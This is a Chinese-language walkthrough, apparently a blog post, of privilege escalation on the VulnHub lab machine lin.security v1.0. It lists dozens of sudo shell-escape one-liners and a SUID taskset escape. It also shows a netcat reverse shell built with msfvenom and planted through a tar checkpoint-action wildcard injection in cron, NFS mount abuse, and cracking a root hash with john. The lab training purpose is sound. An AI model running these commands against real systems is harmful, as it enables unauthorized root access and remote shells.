vulnhub系列:lin.security_v1.0靶机

lin.security_v1.0靶机

靶机下载

账号密码

bob:secret

登录查看靶机ip

image-20240728130220588

ssh连接靶机

ssh bob@192.168.23.166

01

查看一下当前用户和权限

02

内核版本不适用脏牛

03

sudo提权

查看支持root权限的命令

sudo -l

04

利用辅助网站参考搜索,根据结果执行对应命令提权

https://gtfobins.github.io/

ash

sudo ash

05

awk

sudo awk 'BEGIN {system("/bin/sh")}'

06

bash

sudo bash

07

csh

sudo csh

01

dash

sudo dash

02

ed

sudo ed

!/bin/sh

03

env

sudo env /bin/sh

04

expect

sudo expect -c 'spawn /bin/sh;interact'

05

find

sudo find . -exec /bin/sh \; -quit

06

ftp

sudo ftp

!/bin/sh

07

man

sudo man man

!/bin/sh

08

more

TERM= sudo more /etc/profile

!/bin/sh

09

scp

TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
sudo scp -S $TF x y:

10

socat

sudo socat stdin exec:/bin/sh

11

ssh

sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x

12

vi

sudo vi -c ':!/bin/sh' /dev/null

13

zsh

sudo zsh

14

perl

sudo perl -e 'exec "/bin/sh";'

15

tclsh

sudo tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr

16

script

sudo script -q /dev/null

17

scp

TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
sudo scp -S $TF x y:

18

suid提权

查看suid文件

find / -perm -u=s -type f 2>/dev/null

08

同样使用辅助网站进行查询,根据查询结果执行对应命令

https://gtfobins.github.io/

taskset

taskset 1 /bin/bash -p

09

计划任务提权

查看计划任务

cat /etc/crontab

10

直接写入没有权限

kali生成payload

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.23.166 lport=9999 R

06

mkfifo /tmp/jeuhde; nc 192.168.23.166 9999 0</tmp/jeuhde | /bin/sh >/tmp/jeuhde 2>&1; rm /tmp/jeuhde

靶机执行命令

echo "mkfifo /tmp/jeuhde; nc 192.168.23.166 9999 0</tmp/jeuhde | /bin/sh >/tmp/jeuhde 2>&1; rm /tmp/jeuhde" > shell.sh && chmod +x shell.sh

echo > "--checkpoint-action=exec=sh shell.sh"

echo > "--checkpoint=1"

07

NFS提权

查看是否开启NFS

cat /etc/exports

01

查看可以访问的NFS目录

showmount -e 192.168.23.166

02

创建nfs目录用来挂载

mkdir /tmp/nfs

挂载目录到/tmp/nfs

mount -o rw,vers=3 192.168.23.166:/home/peter /tmp/nfs

03

生成恶意文件

msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf

发现没有写入权限,创建一个gid为1005的用户组,然后创建peter账户,uid指定为1001,gid指定为1005

04

切换到peter用户,再次执行

05

靶机执行文件,但是没提到权限

不安全配置

passwd

查看/etc/passwd文件

cat /etc/passwd

发现有一个root权限的用户存在加密的密码

08

将密码写入1.txt文件中,利用john进行解密

sudo john --wordlist=rockyou.txt 1.txt

密码

P@ssw0rd

09

进行登录

10

  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值